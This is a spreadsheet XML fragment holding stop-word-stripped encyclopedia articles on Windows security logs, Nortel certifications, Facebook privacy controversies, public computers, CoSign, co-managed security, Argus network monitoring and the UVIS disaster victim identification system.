accounts privilege". microsoft windows internals states, "processes call audit system services must seauditprivilege privilege successfully generate audit record". winzapper notes "possible 'made event records log" feature added considered "too nasty," reference fact someone administrator access could functionality shift blame unauthorized activity innocent party. server 2003 added calls applications could register security event logs write security audit entries. specifically, authzinstallsecurityeventsource function installs specified source security event source. admissibility court eventtracker newsletter states "the possibility tampering enough cause logs inadmissible, must specific evidence tampering order logs considered inadmissible". also common format management syslog references external links description security events windows vista windows server 2008 description security events windows vista windows server 2008 (xls)</t>
  </si>
  <si>
    <t>Nortel Certifications</t>
  </si>
  <si>
    <t>nortel certifications professional certifications nortel products ieee standard technologies. there major levels certification, specialist expert. within level three sublevels; technology, support, design. certification exams administered prometric testing centers. various training courses held nortel regional training partners, global knowledge. nortel began exit certain businesses divest itself, retired various certification training programs exams. they retired gsm-related programs march 2008, optical carrier voip programs september 2009, lastly enterprise programs november 2010. nortel certified technology specialist (ncts) technology certification starting point validating education basic technology knowledge, creates good foundation build professional certifications. nortel certified support specialist (ncss) ncss certification demonstrates application entry level knowledge regard installation, administration, configuration, maintenance, troubleshooting nortel products solutions. nortel certified design specialist (ncds) ncds certification demonstrates application entry level knowledge regard planning, design, engineering network consisting nortel products. expert certifications nortel certified technology expert (ncte) ncte certification builds upon knowledge required ncts certification. ncte demonstrates advanced technical proficiency underlying network technologies protocols. nortel certified support expert (ncse) ncse certification builds upon knowledge required ncss certification. ncse demonstrates application advanced level knowledge regard installation, administration, configuration, maintenance, troubleshooting complex networks consisting multiple products networking functionality. nortel certified design expert (ncde) ncde certification builds upon knowledge required ncds certification. ncde demonstrates application advanced level knowledge regard planning, design, engineering complex networks consisting multiple products underlying functionality. architect certification nortel certified architect (nca) certification nortel's highest credential required expert-level knowledge three core areas: technology, design, support. references external links nortel's training certification website</t>
  </si>
  <si>
    <t>Privacy concerns with Facebook</t>
  </si>
  <si>
    <t xml:space="preserve">meta platforms inc., meta short, (formerly known facebook) faced number privacy concerns. these stem partly company’s revenue model involves selling information collected users many things including advertisement targeting. meta platforms inc. also part many data breaches occurred within company. these issues others described including user data concerns, vulnerabilities company’s platform, investigations pressure groups government agencies, even issues students. addition, employers organizations/individuals known meta platforms inc. purposes. result, individuals’ identities private information sometimes compromised without permission. response growing privacy concerns, pressure groups government agencies increasingly asserted users’ right privacy able control personal data. user data concerns widening exposure member information 2011–2012 2010, electronic frontier foundation identified personal information aggregation techniques called "connections" "instant personalization". they demonstrated anyone could access information saved facebook profile, even information intended made public. "connection" created user clicks "like" button product service, either facebook external site. facebook treats relationships public information, user's identity displayed facebook page product service.instant personalization pilot program shared facebook account information affiliated sites, sharing user's list "liked" bands music website, user visits site, preferred music plays automatically. noted "for users opted out, instant personalization instant data leakage. soon visit sites pilot program (yelp, pandora, microsoft docs) sites access name, picture, gender, current location, list friends, pages liked—everything facebook classifies public information. even opt-out instant personalization, there's still data leakage friends instant personalization websites—their activities give away information you, unless block applications individually."on december 2012, news reported randi zuckerberg, sister facebook founder mark zuckerberg, criticized friend "way uncool" sharing private facebook photo twitter, told image appeared friend-of-a-friend's facebook news feed. commenting misunderstanding facebook's privacy settings, galperin said "even randi zuckerberg wrong. that's illustration confusing be." issues 2007 august 2007, code used generate facebook's home search page visitors browse site accidentally made public. configuration problem facebook server caused code displayed instead page code created, raising concerns secure private data site was. visitor site copied, published later removed code forum, claiming served threatened legal notice facebook. facebook's response quoted site broke story: small fraction code displays facebook pages exposed small number users single misconfigured server fixed immediately. security breach compromise user data way. because code released powers facebook user interface, offers useful insight inner workings facebook. reprinting code violates several laws people distribute further. november, facebook launched beacon, system (discontinued september 2009) third-party websites could include script facebook sites, send information actions facebook users site facebook, prompting serious privacy concerns. information purchases made games played published user's news feed. informative notice action appeared third party site allowed user cancel user could also cancel facebook. originally action taken, information automatically published. november changed require confirmation user publishing story gathered beacon. december facebook's credibility regard beacon program tested reported york times "essentially accuses" mark zuckerberg lying paper leaving coca-cola, reversing course program, similar impression. security engineer inc. also claimed november 2007, blog post facebook collected data affiliate sites even consumer opted even logged facebook site. november 2007, security blog posted facebook clarification statement addressing data collected beacon program: when facebook user takes beacon-enabled action participating site, information sent facebook order facebook operate beacon technologically. facebook user clicks 'no, thanks' partner site notification, facebook data deletes servers. separately, facebook determine whether user logged data transferred participating site facebook. cases, facebook associate information individual user account, deletes data well. beacon service ended september 2009 along settlement class-action lawsuit facebook resulting service. news feed mini-feed september 2006, facebook introduced features called "news feed" "mini-feed". first features, news feed, appears every facebook member's home page, displaying recent facebook activities member's friends. second feature, mini-feed, keeps similar events member's profile page. members manually delete items mini-feeds wish privacy settings control actually published respective mini-feeds. some facebook members still feel ability entire news feed mini-feed system necessary, evidenced statement students against facebook news feed group, peaked 740,000 members 2006. reacting users' concerns, facebook developed privacy features give users control information broadcast news feed. according subsequent news articles, members widely regarded additional privacy options acceptable compromise.in 2010, facebook added privacy controls streamlined privacy settings, giving users ways manage status updates information broadcast public news feed. among privacy settings ability control sees status update user posts: everyone, friends friends, friends only. users hide status update specific people well. however, user presses "like" comments photo status update friend cannot prevent action appearing news feeds user's friends, even non-mutual ones. "view option, used show user privacy controls filter specific given friend see, displays user's timeline gives indication items missing timeline still showing friend's news feed. inability voluntarily terminate accounts facebook allowed users deactivate accounts actually remove account content servers. facebook representative explained student university british columbia users clear accounts manually deleting content including wall posts, friends, groups. york times noted issue raised concern emails private user data remain indefinitely facebook's servers. facebook subsequently began allowing users permanently delete accounts 2010. facebook's privacy policy states, "when delete account, permanently deleted facebook." memorials notable ancillary effect social-networking websites ability participants mourn publicly deceased individual. facebook, friends often leave messages sadness, grief, hope individual's page, transforming public book condolences. this particular phenomenon documented number schools. facebook originally held policy profiles people known deceased would removed days privacy concerns. user response, facebook changed policy place deceased members' profiles "memorialization state". facebook's privacy policy regarding memorialization says, notified user deceased, memorialize user's account. cases restrict profile access confirmed friends allow friends family write user's wall remembrance. close account receive formal request user's next proper legal request so."some memorial groups also caused legal issues. notably, january 2008, memorial group posted identity murdered toronto teenager stefanie rengel, whose family given toronto police service consent release name media, identities accused killers, defiance canada's youth criminal justice act, prohibits publishing names under-age accused. while police facebook staff attempted comply privacy regulations deleting posts, noted difficulty effectively policing individual users repeatedly republished deleted information. customization security july 2007, adrienne felt, undergraduate student university virginia, discovered cross-site scripting (xss) hole facebook platform could inject javascript profiles. used hole import custom demonstrate platform could used violate privacy rules create worm. inadequate privacy controls facebook offers privacy controls order allow users choose view posts: friends, friends friends friends, everyone, custom (specific choice friends posts). while options exist, still methods otherwise unauthorized third parties view post. example, posting picture marking viewable friends, tagging someone else appearing picture, causes post viewable friends tagged person(s).photos taken people others posted facebook without knowledge consent people appearing image; persons multiple photos feature facebook without aware study suggested photo person reflects poorly posted online harmful effect losing password.when commenting private post, commenting user informed post commented later made public would make comment said post also publicly viewable. quit facebook quit facebook online event took place 2010 (coinciding memorial day), facebook users stated would quit social network privacy concerns. estimated facebook users coming united states would delete accounts. however, 33,000 (roughly 0.0066% roughly million members time) users quit site. number reason users quit facebook privacy concerns (48%), followed general dissatisfaction facebook (14%), negative aspects regarding facebook friends (13%), feeling getting addicted facebook (6%). facebook quitters found concerned privacy, addicted internet, conscientious. photo recognition face tagging facebook enabled automatic facial recognition feature june 2011, called "tag suggestions", product research project named "deepface". feature compares newly uploaded photographs uploader's facebook friends, suggest photo tags. national journal daily claims "facebook facing scrutiny decision automatically turn facial recognition feature aimed helping users identify friends photos". facebook defended feature, saying users disable facebook introduced feature opt-out basis. european union data-protection regulators said would investigate feature violated privacy rules. naomi lachance stated blog npr, tech considered, facebook's facial recognition right time compared fbi's people. however, accuracy facebook searches larger, diverse photo selection compared fbi's closed database. mark zuckerberg showed worries speaking facebook's ais, saying, "unsupervised learning long-term focus research team facebook, remains important challenge whole research community" save lives diagnosing diseases driving around safely. enable breakthroughs helping find planets understand earth's climate. help areas even thought today".in 2016, facebook faced lawsuit illinois violations biometric information privacy act. february 2021, company settled, agreeing $650 million, shut feature december 2021. following shutdown, cher scarlett, former apple security engineer, january 2022 tweeted photo auto-tagged someone unknown prior shutdown. photo 19th century said learned great-great-great grandmother volga german ancestry, saying technology "dangerous" "off-putting", pointed implication genocide. tracking non-members facebook article published today november 2011 claimed facebook creates logs pages visited members non-members, relying tracking cookies keep track pages visited.in early november 2015, facebook ordered belgian privacy commissioner cease tracking non-users, citing european laws, risk fines £250,000 day. result, instead removing tracking cookies, facebook banned non-users belgium seeing material facebook, including publicly posted content, unless sign facebook criticized ruling, saying cookies provided better security. stalking statistics, facebook profiles automatically "visible public", meaning anyone access profiles users updated. facebook also built-in messaging system people send messages user, unless disabled feature "from friends only". stalking limited stalking, lead "in-person" stalking nearly real-life stalking victims reported started online instant messaging (e.g., facebook chat). sharing private messages contacts' details without consent december 2018, emerged facebook had, period 2010–2018, granted access users' private messages, address book contents, private posts, without users' consent, third parties including microsoft, amazon, yahoo, netflix, spotify. this occurring despite public statements facebook stopped sharing years earlier. denial location privacy, regardless user settings december 2018, emerged facebook's mobile reveals user's location facebook, even user "check feature configured relevant settings within maximize location privacy. health data apps sent facebook without user consent february 2019, emerged number facebook apps, including flo, sending users' health data blood pressure ovulation status facebook without users' informed consent. york governor andrew cuomo called practice "outrageous abuse privacy", ordered york's department state department financial services investigate, encouraged federal regulators step oculus metaverse platforms facebook's acquisition virtual reality headset manufacturer oculus resulted ongoing concerns integration hardware software platforms facebook user data. after acquisition, oculus co-founder palmer luckey assured users "you need facebook account every time wanna oculus rift."initially, oculus desktop software provided opt-in integration facebook, primarily identifying facebook users within oculus friends list. august 2020, facebook announced oculus products services would become subject unified facebook privacy policy, code conduct, community guidelines moving forward, facebook account would required oculus products services beginning october. time, ability create standalone oculus account discontinued, accounts deprecated effective january 2023, facebook accounts would mandatory future oculus hardware, beginning oculus quest 2.the requirements, well facebook's later focus "metaverse" platforms, concerns amount user data could collected company virtual reality hardware interactions, including user's surroundings, motions actions, biometrics. horizon, social network part oculus platform, subject facebook policies, performs "rolling" recordings interactions could uploaded facebook servers purposes moderation users reported, users observed moderators without knowledge reported others, "signals" regarding user raised users actions (such muting).in september 2020, facebook pulled oculus products german market concerns local regulators policy's compliance european union's general data protection regulation (gdpr). december 2020, german federal cartel office (bundeskartellamt) launched antitrust investigation facebook's mandatory integration social networking platform virtual reality products.at facebook connect event october 2021 (where facebook, inc. announced rebranding meta), zuckerberg stated meta "working making quest account personal facebook account". "meta account" announced july 2022 facto replacement oculus accounts, explicitly tied facebook social network, linked members facebook family apps. stated meta quest users would allowed transition meta accounts decouple facebook logins platforms. technica noted terms service privacy policies associated meta account system could allow enforcement real name policy (stating users would obligated provide "accurate date information (including registration information), include providing personal data", still allowed "rampant" user data meta, especially linked facebook apps. scraping contact information personal information million facebook users, including names, phone numbers, email addresses, user profile data, posted hacking forum april, 2021. this information previously leaked feature allowing users find phone number, facebook fixed prevent abuse september 2019. company decided notify users data breach.the irish data protection commission, jurisdiction facebook location headquarters, opened investigation breach possible violation gdpr. allegations eavesdropping there allegations users facebook's mobile capable listening conversations without consent, citing instances service displaying advertisements products spoken about, otherwise prior interactions with. august 2019, facebook admitted sending anonymized voice data messenger third-party contractors human review order improve quality automatic transcription function, denied data used personalized advertising. company also stated recently suspended human reviews scrutiny amazon, apple, google's similar practices voice assistant platforms. platform vulnerabilities data mining there concerns expressed regarding facebook means surveillance data mining. massachusetts institute technology (mit) students used automated script download publicly posted information 70,000 facebook profiles four schools (mit, nyu, university oklahoma, harvard university) part research project facebook privacy published december 2005. since then, facebook bolstered security protection users, responding: "we've built numerous defenses combat phishing malware, including complex automated systems work behind scenes detect flag facebook accounts likely compromised (based anomalous activity like lots messages sent short period time, messages links known bad)."a second clause brought criticism users allowed facebook right sell users' data private companies, stating share information third parties, including responsible companies relationship." this concern addressed spokesman chris hughes, said, "simply put, never provided users' information third party companies, intend to." facebook eventually removed clause privacy policy.in united kingdom, trades union congress (tuc) encouraged employers allow staff access facebook social-networking sites work, provided proceed caution.in september 2007, facebook drew criticism began allowing search engines index profile pages, though facebook's privacy settings allow users turn off.concerns also raised bbc's watchdog program october 2007 facebook shown easy collect individual's personal information facilitate identity theft. however, barely personal information presented non-friends users leave privacy controls default settings, personal information visible non-friend user's name, gender, profile picture networks.an article york times february 2008 pointed facebook actually provide mechanism users close accounts, raised concern private user data would remain indefinitely facebook's servers. 2013, facebook gives users options deactivate delete accounts. deactivating account allows restored later, deleting remove account "permanently", although data submitted account ("like posting group sending someone message") remain. onavo facebook research 2013, facebook acquired onavo, developer mobile utility apps onavo protect vpn, used part "insights" platform gauge market share apps. this data since used influence acquisitions business decisions regarding facebook products. criticism practice emerged 2018, facebook began advertise onavo protect within main devices united states. media outlets considered effectively spyware behavior, adding app's listings readily disclaim facebook's ownership data collection practices. facebook subsequently pulled version app, citing store policies forbidding apps performing analytics usage apps user's device.since 2016, facebook also "project atlas"—publicly known "facebook research"—a market research program inviting teenagers young adults ages data usage, browsing history, search history, location history, personal messages, photos, videos, emails, amazon order history, analyzed facebook. participants would receive per-month participating program. facebook research administered third-party beta testing services, including applause, requires users install facebook root certificate phone. after january 2019 report techcrunch project atlas, alleged facebook bypassed store using apple enterprise program apps used internally company's employees, facebook refuted article later announced discontinuation program ios.on january 2019, apple temporarily revoked facebook's enterprise developer program certificates day, caused company's internal apps become inoperable. apple stated "facebook using membership distribute data-collecting consumers, clear breach agreement apple", certificates revoked protect users data". senators mark warner, richard blumenthal, markey separately criticized facebook research's targeting teenagers, promised sponsor legislation regulate market research programs. 2010 application privacy breach 2010, wall street journal found many facebook's top-rated apps—including apps zynga lolapps—were transmitting identifying information "dozens advertising internet tracking companies" like rapleaf. apps used http referer exposed user's identity sometimes friends' identities. facebook said "while knowledge user permit access anyone’s private information facebook, plan introduce technical systems dramatically limit sharing user id’s". blog post member facebook's team stated "press reports exaggerated implications sharing user id", though still acknowledging apps passing manner violated facebook's policies. 2010 user list 2010, canadian security consultant bowes skull security created bittorrent download consisting names million facebook users. facebook likened information listed phone book. included opted found search engines, realize information public. bowes created list statistical information user names, used penetration testing computer break-ins. at&amp;t routing glitch 2009 2010, fact facebook requiring connections https login meant routing glitch at&amp;t caused cookie wrong users' phones. this resulted facebook users continuous access another person's account instead own. facebook cambridge analytica data scandal 2018, facebook admitted made global science research alexandr kogan, related cambridge analytica, able 2014 harvest personal data million facebook users without consent, exploiting friendship connection users sold data app. following revelations breach, several public figures, including industrialist elon musk whatsapp cofounder brian acton, announced deleting facebook accounts, using hashtag "#deletefacebook".facebook also criticized allowing 2012 barack obama presidential campaign analyze target select users providing campaign friendship connections users signed application. however, users signing application aware data, data friends, going political party. unpublished photo disclosure september 2018, software meant photos uploaded facebook accounts, "published" (and therefore remained private user facebook), exposed developers. approximately million users 1500 third-party apps affected. unencrypted password storage march 2019, facebook admitted mistakenly stored "hundreds millions" passwords facebook instagram users plaintext opposed hashed salted) multiple internal systems accessible facebook engineers, dating back 2012. facebook stated affected users would notified, evidence data abused leaked.in april 2019, facebook admitted subsidiary instagram also stored millions unencrypted passwords.facebook denied years listens conversations turn releases based them, however facebook shown lied policies past. 2016, facebook stated "facebook phone's microphone inform change news feed." spokeswoman said, "some recent articles suggested must listening people's conversations order show relevant ads. this true. show based people's interests profile information, you’re talking loud about." investigations cooperation government requests government local authorities rely facebook social networks investigate crimes obtain evidence help establish crime, provide location information, establish motives, prove disprove alibis, reveal communications. federal, state, local investigations restricted profiles publicly available willingly provided government; facebook willingly provided information response government subpoenas requests, except regard private, unopened inbox messages less days old, would require warrant finding probable cause federal electronic communications privacy (ecpa). 2011 article noted "even government lacks reasonable suspicion criminal activity user opts strictest privacy controls, facebook users still cannot expect federal stop 'private' content communications used them".facebook's privacy policy states also share information good faith belief necessary prevent fraud illegal activity, prevent imminent bodily harm, protect people violating statement rights responsibilities. this include sharing information companies, lawyers, courts government entities". since u.s. congress failed meaningfully amend ecpa protect communications social-networking sites facebook, since u.s. supreme court largely refused recognize fourth amendment privacy right information shared third party, federal statutory constitutional right prevents government issuing requests amount fishing expeditions facebook privacy policy forbids company handing private user information suggests illegal activity.the 2013 mass surveillance disclosures identified facebook participant u.s. national security administration's prism program. facebook reports number requests receives user information governments around world.in 2022, nesbraska police charged teenage girl mother obtaining facebook messages allegedly showed performed illegal self-managed medication abortion. complaint cippic 2008, canadian internet policy public interest clinic (cippic), director phillipa lawson, filed 35-page complaint office privacy commissioner facebook based breaches canadian personal information protection electronic documents (pipeda). university ottawa students lisa feinberg, harley finkelstein, jordan eric plener, initiated "minefield privacy invasion" suit. facebook's chris kelly contradicted claims, saying that: "we've reviewed complaint found serious factual errors—most notably neglect fact almost facebook data willingly shared users." assistant privacy commissioner elizabeth denham released report findings july 2009. found several cippic's complaints well-founded. facebook agreed comply some, all, recommendations. assistant commissioner found facebook enough ensure users granted meaningful consent disclosure personal information third parties place adequate safeguards prevent unauthorized access third party developers personal information. investigation irish data protection commissioner, 2011–2012 august 2011, irish data protection commissioner (dpc) started investigation receiving complaints europe-v-facebook.org, founded group austrian students. stated first reactions irish legally responsible privacy facebook users within european union "investigate complaints using full legal powers necessary". complaints filed ireland users residents united states canada contract "facebook ireland ltd", located dublin, ireland. under european facebook ireland "data controller" facebook.com, therefore, facebook.com governed european data protection laws. facebook ireland ltd. established facebook inc. avoid taxes (see double irish arrangement).the group 'europe-v-facebook.org' made access requests facebook ireland received 1,222 pages data person data categories facebook holding them, including data previously removed users. group claimed facebook failed provide requested data, including "likes", facial recognition data, data third party websites "social plugins" visited users, information uploaded videos. currently group claims facebook holds least data categories every user.the first complaints target different problems, undeleted "pokes" question sharing functions facebook opt-in opt-out. second wave complaints targeting issues including "like" button. severe could complaint claims privacy policy, consent privacy policy void european laws. interview irish independent, spokesperson said audit facebook, premises great detail every aspect security". continued saying: "it's significant, detailed intense undertaking stretch four five days." december 2011 published first report facebook. this report legally binding suggested changes facebook undertake july 2012. planning review facebook's progress july 2012. changes spring 2012, facebook undertake many changes (e.g., extended download tool allow users exercise european right access stored information update worldwide privacy policy). these changes seen sufficient comply european europe-v-facebook.org. download tool allow, example, access data. group launched our-policy.org suggest improvements policy, backdrop privacy facebook. since group managed 7.000 comments facebook's pages, facebook worldwide vote proposed changes. such vote would binding users would taken part. facebook promote vote, resulting 0.038% participation voting facebook's policy. privacy policy took effect day. international lobbying privacy protections early 2019, reported facebook spent years lobbying extensively privacy protection laws around world, gdpr.the lobbying included efforts sandberg "bond" female european officials including enda kenny (then prime minister ireland, facebook's european operations based), influence facebook's favor. other politicians reportedly lobbied facebook relation privacy protection laws included george osborne (then chancellor exchequer), pranab mukherjee (then president india), michel barnier.in 2021 facebook attempted legal trick" bypass gdpr regulations european union including personal data processing agreement considered "contract" (article 6(1)(b) gdpr) rather "consent" (article 6(1)(a) gdpr) would lead user effectively granting facebook broad permission process personal data gdpr controls void. irish data protection commission (dpc) expressed preliminary approval bypass sent draft decision data protection authorities european union, point document leaked media published noyb.eu. sent takedown notice noyb.eu, also published portal reject self-censor. promotion service "free" december 2019, hungarian competition authority fined facebook around us$4 million false advertising, ruling facebook cannot market "free" cost) service detailed personal information deliver targeted advertising constituted compensation must provided facebook service. student-related issues student privacy concerns students post illegal otherwise inappropriate material faced disciplinary action universities, colleges, schools including expulsion. others posting libelous content relating faculty also faced disciplinary action. journal education business states recent study facebook profiles found comments regarding alcohol, photos involving alcohol use, comments regarding sexual activities, seminude sexually provocative photos, included profanity." inferred negative incriminating facebook posts affect alumni's potential employers' perception them. this perception greatly impact students' relationships, ability gain employment, maintain school enrollment. desire social acceptance leads individuals want share intimate details personal lives along illicit drug binge drinking. often, portrayals daily lives exaggerated and/or embellished attract others like minded them. effect class engagement students general higher engagement using facebook groups class, students comment other's short writings videos. however, limits student's writing shorter since checking spelling typing phone keyword relatively time consuming. effect higher education january 2006, chronicle higher education continued ongoing national debate social networks opinion piece written michael bugeja, director journalism school iowa state university, entitled "facing facebook". bugeja, author oxford university press text interpersonal divide (2005), quoted representatives american association university professors colleagues higher education document distraction students using facebook social networks class venues wireless campus. bugeja followed january 2007 chronicle article titled "distractions wireless classroom", quoting several educators across country banning laptops classroom. similarly, organizations national association campus activities, association education journalism mass communication, others hosted seminars presentations discuss ramifications students' facebook social-networking sites. educause learning initiative also released brief pamphlet entitled things should know about facebook" aimed higher education professionals "describes [facebook] going, matters teaching learning".some research facebook higher education suggests small educational benefits associated student facebook use, including improving engagement related student retention. 2012 research found time spent facebook related involvement campus activities. this study found certain facebook activities like commenting creating rsvping events positively related student engagement playing games checking friends negatively related. furthermore, using </t>
  </si>
  <si>
    <t>Public computer</t>
  </si>
  <si>
    <t>public computer public access computer) various computers available public areas. some places public computers available libraries, schools, dedicated facilities government. public computers share similar hardware software components personal computers, however, role function public access computer entirely different. public access computer used many different untrusted individuals throughout course day. computer must locked secure intentional unintentional abuse. users typically authority install software change settings. personal computer, contrast, typically used single responsible user, customize machine's behavior preferences. public access computers often provided tools reservation system regulate access. world's first public access computer center marin computer center california, co-founded david annie 1977. kiosks kiosk special type public computer using software hardware modifications provide services place kiosk example, movie ticket kiosk found movie theater. these kiosks usually secure browser zero access desktop. many kiosks linux, however, atms, kiosk designed depositing money, often windows public computers united states library computers united states canada, almost public libraries computers available patrons, though libraries impose time limit users ensure others turn keep library less busy. users often allowed print documents created using computers, though sometimes small fee. school computers u.s. government given money many school boards purchase computers educational applications. schools multiple computer labs, contain computers students use. there usually internet access machines, schools blocking service limit websites students able access include educational resources, google. addition controlling content students viewing, putting blocks also help keep computers safe preventing students downloading malware threats. however, effectiveness content filtering systems questionable since easily circumvented using proxy websites, virtual private networks, weak security systems, merely knowing address intended website enough bypass filter. school computers often advanced operating system security prevent tech-savvy students inflicting damage (i.e. windows registry editor task manager, etc.) disabled microsoft windows machines. schools advanced tech services also install locked bios/firmware make kernel-level changes operating system, precluding possibility unauthorized activity. also personal computer telecenter internet cafe references</t>
  </si>
  <si>
    <t>CoSign single sign on</t>
  </si>
  <si>
    <t>cosign open-source project originally designed research systems unix group provide university michigan secure single sign-on authentication system. cosign authenticates user server provides environment variable user's name. when user accesses part site requires authentication, presence variable allows access without sign again. cosign part national science foundation middleware initiative (nmi) edit software release. also central authentication service pubcookie stanford webauth university minnesota cookieauth shibboleth (internet2) external links cosign homepage cosign wiki</t>
  </si>
  <si>
    <t>Co-managed Security</t>
  </si>
  <si>
    <t>co-managed security service model entails security monitoring, event correlation, incident response, system tuning, compliance support across organization's entire environment. co-management allows organizations collaborate managed security service providers blending security expertise provider contextual knowledge customer optimise security posture.outsourcing security affairs leave clients dark regards major security breaches events.the combined involvement client managed security service providers (mssp) relation siem softwares allow immediate response security breaches, increased transparency reduce workload internal security teams. cooperative management siem softwares allow sharing expert knowledge internal security teams mssp. co-managed security services also allow organizations’ critical data tools remotely managed team certified engineers security analysts 24/7/365 security operations center (soc). this service approach allows customer data remain in-house siem platform either on-site cloud-hosted. service provider's staff work conjunction customer security teams outline rules engagement inside environment provide monitoring response alerts real-time. security operation center also provide “care feeding”, development variety security solutions. co-managed approach also allows organizations focus emerging internal projects critical areas according gartner's when co-managed security information event management report, “co-managed siem services enable security risk management leaders maximize value siem enhance security monitoring capabilities, retaining control flexibility.” "co-management rise expected grow five-fold 2020." siem, ids/ips, compliance automation, network configuration management tools, advanced threat intelligence, network access control, endpoint threat detection response, application security, file integrity monitoring, forensic investigation, vulnerability scanning assessment, examples cyber security solutions co-managed service providers support. references</t>
  </si>
  <si>
    <t>Argus – Audit Record Generation and Utilization System</t>
  </si>
  <si>
    <t>argus audit record generation utilization system first implementation network flow monitoring, ongoing open source network flow monitor project. started carter bullard 1984 georgia tech, developed cyber security carnegie mellon university early 1990s, argus important contributor internet cyber security technology years. [1]. argus project focused developing aspects large scale network situational awareness network audit trail establishment support network operations (netops), performance security management. motivated telco call detail record (cdr), argus attempts generate network metadata used perform large number network management tasks. argus used many universities, corporations government entities including disa, dod, dhs, ffrdcs, gloriad internet security tool. argus designed real-time situational awareness system, data used track, alarm alert wire-line network conditions. data also used establish comprehensive audit network traffic, described book, ncsc-tg-005, supplementing traditional intrusion detection system (ids) based network security. audit trail traditionally used historical network traffic measurement data network forensics network behavior anomaly detection (nbad). argus used extensively cybersecurity, end-to-end performance analysis, recently, software-defined networking (sdn) research. argus also topic network management standards development. rmon (1995) ipfix (2001).argus composed advanced comprehensive network flow data generator, argus monitor, processes packets (either capture files live packet data) generates detailed network traffic flow status reports flows packet stream. argus monitors network traffic, data plane, control plane management plane, internet protocol (ip) traffic. argus captures much packet dynamics semantics flow, great deal data reduction, store, process, inspect analyze large amounts network data efficiently. argus provides reachability, availability, connectivity, duration, rate, load, good-put, loss, jitter, retransmission (data networks), delay metrics network flows, captures attributes available packet contents, layer addresses, tunnel identifiers (mpls, gre, ipsec, etc...), protocol ids, sap's, hop-count, options, transport identification (rtp detection), host flow control indications, etc... argus implemented number packet dynamics metrics specifically designed cyber security. argus detects human typing behavior flow, particular interest key-stroke detection encrypted tunnels. argus generates producer consumer ratio (pcr) indicates whether network entity data producer and/or consumer, important property evaluating potential node involved advanced persistent threat (apt) mediated exfiltration. argus open source (gpl) project, owned managed qosient, llc, ported operating systems many hardware accelerated platforms, bivio, pluribus, arista, tilera. software portable many environments little modifications. performance auditing entire enterprise's internet activity accomplished using modest computing resources. supported platforms linux: unix operating system running linux kernel solaris: unix operating system developed microsystems bsd: unix operating system family (freebsd, netbsd, openbsd) unix operating system developed apple inc. irix: unix operating system developed silicon graphics aix, unix operating system developed windows, (under cygwin) operating system developed microsoft openwrt: unix operation system running linux kernel embedded devices references external links argus website</t>
  </si>
  <si>
    <t>Unified Victim Identification System</t>
  </si>
  <si>
    <t>unified victim identification system (uvis) internet-enabled database system developed office chief medical examiner city york (ocme) aftermath september attacks york city crash american airlines flight 587. intended handle critical fatality management functions made necessary major disaster. uvis strong flexible role-based application permissions controlled dynamically.in event mass casualty event, initially used york city's call center operators, york police department, ocme gather information facilitate compiling accurate list missing persons. uvis also used ocme track decedents collect postmortem findings facilitate identification process disaster. uvis also contains pandemic module prepare eventuality. uvis strong flexible role-based application permissions controlled dynamically. uvis built ocme nihilent, consulting solution integration company, leading design thinking company, (formerly known icra sapphire).developed public funds, uvis available municipalities, counties, states, governmental agencies without charge, license york city. currently uvis office chief medical examiner city york (ocme) state jersey (ocsme). ante-mortem section ante-mortem section relates activities carried individual absolutely known deceased. these include recording information missing individual managing interactions missing person's family members. call center module mass casualty events generate numerous calls government agencies: example, 2005 london subway bombing generated 42,000 calls casualty bureau call centers within bureau's first hour operation. call center module handle tens thousands calls individuals reporting enquiring missing persons, record basic information missing person caller. missing persons module missing persons module enables nypd missing persons detectives conduct detailed interviews family members, friends, acquaintances missing persons, store extremely detailed data ranging clothing physical characteristics hair color tattoo scar information. family assistance center module uvis family assistance center module manages family assistance centers (facs), established provide services capture information from, family friends injured, missing, deceased disaster victims. services generally provided include: grief counseling; childcare; religious support; facilitation family needs hotel, food, transportation; ante-mortem data collection investigative authorities medical examiner coroner; notification death next kin. uvis family assistance center module tracks interactions appointments family missing persons, manage personal items victims received family members identification purposes. records module records modules handles requests records family members, lawyers, public administrators, providing “chain custody” records. post-mortem section post-mortem section deals human remains recovered mass casualty sites. field operation module field operations module help users manage incidents, field investigation, collection remains evidence, well maintaining records documentation remains evidence. because internet connectivity often unavailable disaster sites, field operations module microsoft windows-based client version capture data off-line synchronize main database connectivity available. disaster mortuary management module disaster mortuary management module provides mortuary management functionality. supports accessioning remains, check-in check-out; examination remains medical examiner anthropology; tracking documentation autopsies individual remains; final disposition remains funeral homes. disaster victim identification module this module bidirectional (from ante- post-mortem back) one-to-many search capabilities based multiple criteria. possesses considerable identification tracking capabilities including dna, fingerprint, radiology, dental (see udim below). module enables identification review verification, including re-sampling. also enables consolidation fragmented remains uncovered. disaster victim identification module conduct notification tracking, including communication family members media given decedent. capable issuing death certification either remains found not. also maintains family communications, schedule track family visits. uvis dental identification module (udim) module forensic odontology add-on, udim possesses detailed charting, complex advanced search, ability look anomalies. pandemic influenza module pandemic influenza remains serious threat. u.s. health human services department forecasts lethal pandemic strikes, deaths could range 209,000 million. influenza pandemic occurs, magnitude event would demand response ocme assist governmental health care facilities well support facilities private sector. health care facilities would affected pandemic include public private hospitals, nursing homes, retirement facilities, prison health clinics, public health clinics, mental health hospitals. during pandemic causing mass fatalities, limited morgues decedent storage space health care facilities quickly overwhelmed. proposed solution consists temporary morgues, known body collection points (bcps), health care facilities. these would either refrigerated 18-wheel trailers refrigerated conex containers. uvis pandemic module enables health care facility morgue managers administer bcps, allowing create report remains, entering information decedent’s medical history, usual residence, next kin, well report notes reporting physician’s information. creating report automatically assigns specimen number remains. search decedent using specimen number, last name, first name, and/or date death. check remains bcp, storing ready released funeral home funeral director. remains also moved location another. browse bcps health care facility locate remains. create request storage unit.the pandemic module also enables medical examiner personnel handle health care facilities’ requests bcps, managing location distribution storage units health care facilities, police precincts, designated location. necessary, place request behalf facility. well, pandemic module enables medical examiner personnel create reports decedents search decedents using specimen number, last name, first name, and/or date death. they also track record progress decedent’s case. currently, system tracks remains awaiting investigation, awaiting disposition, transportation. uvis tracks time elapsed state color-codes record, giving immediate visual indication status case. ocme personnel also search york state electronic death record system (edrs) decedents. part uvis, pandemic influenza module’s data available search within system. administrative section administrative section allows users create incidents, missing persons attached; conduct records management; carry system administration tasks. technical description uvis multi-tiered, browser- windows-based application, written microsoft-based technology, running minimum configuration microsoft windows server 2003 microsoft 2000 2005 database engine. recent updates currently uvis code base upgraded support daily operations medical examiner offices along disaster operations post-mortem operations same. based permissions, users toggle daily disaster option. having application helps decrease user training event mass fatality. strong chain custody built within uvis tracking purposes. terms technology uvis upgraded microsoft windows server 2016 (and higher) server 2016 (and higher). notes references city 